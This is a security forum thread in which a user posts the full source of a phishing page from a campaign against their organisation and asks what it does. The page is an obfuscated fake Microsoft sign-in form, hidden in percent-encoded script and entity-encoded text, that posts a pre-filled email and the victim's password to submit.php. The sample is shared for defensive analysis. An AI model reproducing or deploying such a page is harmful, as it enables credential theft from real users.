Thread Info
  • State Verified Answer
  • Locked Locked
  • Replies 4 replies
  • Subscribers 8 subscribers
  • Views 16474 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

malicious encoded javascript in website source code

LHerzog

Hi,

can you decrypt this code lines seen in a recent pishing campaing hitting us?

Partially base64 encoded javascript, variables for something called spoguestaccess which makes me nervous and so on.

What does it do? Download payload? Currently not detected by Intercept-X

PS: also have a case open for this

sourcecode1.txt

Fullscreen sourcecode2.txt Download 

<!DOCTYPE html>
<html>
<head>
	<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta name="robots" content "none">
	<meta name="Googlebot" content="nofollow">
	<meta name="robots" content "noindex, nofollow">
	<link rel="shortcut icon" type="icon" href="images/favicon.png">
	<link rel="stylesheet" type="text/css" href="style.css">
	<script type="text/javascript" src="js/jquery.js"></script>	
	
</head>

<body>
<script type="text/javascript">
<!--
document.write(unescape('%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%0A%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%6F%67%69%6E%2D%62%6F%78%22%3E%0A%09%09%09%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%6D%73%2D%6C%6F%67%6F%2D%76%32%2E%6A%70%67%22%20%61%6C%74%3D%22%6C%6F%67%6F%22%3E%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%65%6E%74%69%74%79%22%20%63%6C%61%73%73%3D%22%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%22%3E'));
//-->
</script>
			
				<div id="identity-name" class="identity">
					&nbsp;&nbsp;&nbsp;<img src="images/arrow.png" alt="arrow">&nbsp;&nbsp;&nbsp;&nbsp;golllel@byom.de				</div>
				
				
			</div>

			<h2 id="title" style="color:#231E17;"><strong>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</strong></h2>
			<p id="message" class="message"></p>

<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%61%64%65%72%22%20%63%6C%61%73%73%3D%22%6C%6F%61%64%65%72%20%68%69%64%64%65%6E%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E'));
//-->
</script>

			<form action="submit.php" method="post">
				<input type="hidden" id="email" name="email" value="golllel@byom.de">
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%72%65%71%75%69%72%65%64%20%61%75%74%6F%66%6F%63%75%73%3E%0A%09%09%09%09%0A%09%09%09%3C%62%72%3E%0A%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%67%72%6F%75%70%32%22%3E%0A%09%09%09%09%0A%09%09%09%09%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%66%61%64%65%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%73%69%67%6E%69%6E%22%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%73%69%67%6E%69%6E%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%0A%09%09%09%3C%2F%66%6F%72%6D%3E%0A%09%09%3C%2F%64%69%76%3E%0A%09%3C%2F%64%69%76%3E%0A%0A%09%3C%66%6F%6F%74%65%72%3E%0A%09%09%3C%75%6C%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%30%3B%26%23%78%37%32%3B%26%23%78%36%39%3B%26%23%78%37%36%3B%26%23%78%36%31%3B%26%23%78%36%33%3B%26%23%78%37%39%3B%20%26%20%26%23%78%36%33%3B%26%23%78%36%46%3B%26%23%78%36%46%3B%26%23%78%36%42%3B%26%23%78%36%39%3B%26%23%78%36%35%3B%26%23%78%37%33%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%34%3B%26%23%78%36%35%3B%26%23%78%37%32%3B%26%23%78%36%44%3B%26%23%78%37%33%3B%26%23%78%32%30%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%32%30%3B%26%23%78%37%35%3B%26%23%78%37%33%3B%26%23%78%36%35%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%3E%26%63%6F%70%79%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%32%30%3B%26%23%78%34%44%3B%26%23%78%36%39%3B%26%23%78%36%33%3B%26%23%78%37%32%3B%26%23%78%36%46%3B%26%23%78%37%33%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%37%34%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%3C%2F%75%6C%3E'));
//-->
</script>
	</footer>

</body>
</html>

Regards



This thread was automatically locked due to age.
Parents Reply Children
No Data
Unfiltered HTML